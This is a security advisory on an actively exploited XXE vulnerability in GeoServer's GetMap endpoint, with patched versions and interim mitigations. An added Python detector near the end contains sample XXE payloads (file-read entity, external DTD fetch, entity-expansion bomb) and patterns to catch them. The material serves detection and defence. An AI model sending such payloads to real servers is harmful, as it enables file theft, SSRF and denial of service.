At a glance: CISA has confirmed active exploitation of a critical XXE vulnerability in OSGeo GeoServer. The flaw allows crafted XML requests to the unauthenticated GetMap endpoint to expose sensitive files, enable SSRF, or cause denial of service. Upgrade to a patched release. Field Effect MDR will issue AROs for vulnerable or internet-exposed GeoServer instances and detect suspicious XML payloads.
Threat summary
On December 11, CISA added a critical vulnerability in OSGeo GeoServer to its Known Exploited Vulnerabilities catalog, noting active exploitation in the wild.
GeoServer is an open-source platform widely used to publish and share geospatial data through Open Geospatial Consortium services such as Web Map Service. Its adoption spans government, research, and commercial organizations, making the exposure broad.
The flaw, tracked as CVE‑2025‑58360, is an XML External Entity (XXE) vulnerability affecting GeoServer version 2.26.1 and earlier. The vulnerability lies in GeoServer's map request handling, specifically the GetMap endpoint. The server fails to properly validate crafted XML map requests, which could allow a threat actor to embed external entity declarations that cause the server to read sensitive files or reach internal systems on the attacker's behalf. Exploitation can lead to arbitrary file access, server‑side request forgery, and denial of service. The vulnerability was assigned a Common Vulnerability Scoring System (CVSS) v3 score of 9.8, indicating critical severity.
GeoServer maintainers released patches on November 25, 2025, in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1.
Insights & mitigations
Any internet-facing GeoServer instance can be targeted without authentication, creating a direct path for data leakage. The vulnerability is not complex to exploit. XXE attacks are well-documented, and exploitation requires only crafted XML requests to a known endpoint. This increases the likelihood of opportunistic scanning and automated exploitation across internet-facing GeoServer deployments.
GeoServer administrators are recommended to upgrade to the latest patched version beyond 2.26.1. Where patching is not immediately possible, restricting access to the `/geoserver/wms` endpoint and monitoring for anomalous XML requests are recommended interim measures.
Field Effect MDR users will be alerted via ARO if vulnerable and/or internet-exposed GeoServer instances are detected in their environment. For an additional layer of defense, Field Effect MDR detects suspicious activity such as unusual or malformed XML payloads, especially those attempting to define external entities.
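The interim measures above (restricting the WMS endpoint and watching for anomalous XML requests) and the detection of payloads that define external entities can both be prototyped in a few lines. The following is an added example, not code from Field Effect, GeoServer or the advisory: it inspects a raw XML request body for the constructs XXE depends on (a DOCTYPE, entity declarations with SYSTEM/PUBLIC identifiers, parameter entity references, and expansion chains used for denial of service) without ever parsing the XML, and exposes a gate function a reverse proxy in front of `/geoserver/wms` could call. The sample request bodies are constructed and simplified; the element names and the placeholder URIs are not real GeoServer schema or real targets.

```python
"""Added example: flag XXE building blocks in raw XML request bodies
before they reach an XML parser (e.g. at a proxy in front of /geoserver/wms)."""
import re
from dataclasses import dataclass, field

# All matching is done on the raw request text. The body is never handed to an
# XML parser here: a permissive parser would resolve the very entities we want
# to catch, which is exactly the failure mode an XXE bug exploits.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_DECL_RE = re.compile(r"<!ENTITY\s+(%\s*)?([^\s>]+)\s+([^>]*)>", re.IGNORECASE | re.DOTALL)
SCHEME_RE = re.compile(r"""["']\s*([A-Za-z][A-Za-z0-9+.-]*):""")   # scheme of a quoted system identifier
PARAM_ENTITY_REF_RE = re.compile(r"%[A-Za-z_:][\w.:-]*;")           # %name; inside the DTD
GENERAL_ENTITY_REF_RE = re.compile(r"&([A-Za-z_:][\w.:-]*);")       # &name; in content
BUILTIN_ENTITIES = {"lt", "gt", "amp", "quot", "apos"}               # legitimate in any XML document


@dataclass
class Finding:
    rule: str
    detail: str


@dataclass
class Verdict:
    findings: list = field(default_factory=list)

    @property
    def rules(self) -> set:
        return {f.rule for f in self.findings}

    @property
    def severity(self) -> str:
        high = {"external-entity", "parameter-entity-ref", "entity-expansion"}
        if self.rules & high:
            return "high"
        if self.rules:
            return "medium"
        return "none"


def inspect_xml_request(body: str, max_entities: int = 10) -> Verdict:
    """Classify a raw XML request body by the XXE constructs it contains."""
    v = Verdict()
    if DOCTYPE_RE.search(body):
        v.findings.append(Finding("doctype", "DOCTYPE declared; a GetMap request has no legitimate need for one"))
    decls = ENTITY_DECL_RE.findall(body)
    for is_param, name, rest in decls:
        # SYSTEM/PUBLIC means the entity's value is fetched from a URI: file read or SSRF.
        if re.match(r"(SYSTEM|PUBLIC)\b", rest, re.IGNORECASE):
            schemes = [s.lower() for s in SCHEME_RE.findall(rest)] or ["unknown scheme"]
            kind = "parameter entity" if is_param else "entity"
            v.findings.append(Finding("external-entity", f"{kind} {name!r} resolves external content via {schemes}"))
    if PARAM_ENTITY_REF_RE.search(body):
        v.findings.append(Finding("parameter-entity-ref", "parameter entity referenced in the DTD (external DTD loading pattern)"))
    refs = [r for r in GENERAL_ENTITY_REF_RE.findall(body) if r not in BUILTIN_ENTITIES]
    if refs:
        v.findings.append(Finding("custom-entity-ref", f"custom entities referenced: {sorted(set(refs))}"))
    # Many declarations, or an entity whose value is itself a pile of references,
    # is the recursive-expansion ("billion laughs") denial-of-service pattern.
    nested = any(len(GENERAL_ENTITY_REF_RE.findall(rest)) >= 5 for _, _, rest in decls)
    if len(decls) > max_entities or nested:
        v.findings.append(Finding("entity-expansion", f"{len(decls)} entity declarations with nested references"))
    return v


def gate_request(body: str):
    """Interim allow/deny decision for a proxy: any DOCTYPE or entity construct is rejected."""
    verdict = inspect_xml_request(body)
    return verdict.severity == "none", verdict


# Constructed sample request bodies (simplified, not real GeoServer schema; URIs are placeholders).
BENIGN = ('<?xml version="1.0"?><GetMap service="WMS" version="1.1.1">'
          '<Layers><Name>example:roads &amp; rails</Name></Layers></GetMap>')
FILE_ENTITY = ('<?xml version="1.0"?><!DOCTYPE GetMap [<!ENTITY xxe SYSTEM "file:///placeholder/path">]>'
               '<GetMap><Layers><Name>&xxe;</Name></Layers></GetMap>')
PARAM_ENTITY = ('<?xml version="1.0"?><!DOCTYPE GetMap [<!ENTITY % ext SYSTEM "http://external.invalid/x.dtd"> %ext;]>'
                '<GetMap/>')
EXPANSION = ('<?xml version="1.0"?><!DOCTYPE GetMap [<!ENTITY a "aaaaaaaa">'
             '<!ENTITY b "&a;&a;&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;&b;&b;">]>'
             '<GetMap><Layers><Name>&c;</Name></Layers></GetMap>')

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("file entity", FILE_ENTITY),
                          ("parameter entity", PARAM_ENTITY), ("expansion", EXPANSION)]:
        allowed, verdict = gate_request(sample)
        print(f"{label:17s} allowed={allowed!s:5s} severity={verdict.severity:6s} rules={sorted(verdict.rules)}")
```

The gate is deliberately blunt: a GetMap request never needs a DOCTYPE, so rejecting every body that carries one is safe for this endpoint and removes the whole class of entity tricks at once, whereas the finer-grained rules exist for alerting and triage rather than for deciding what to block.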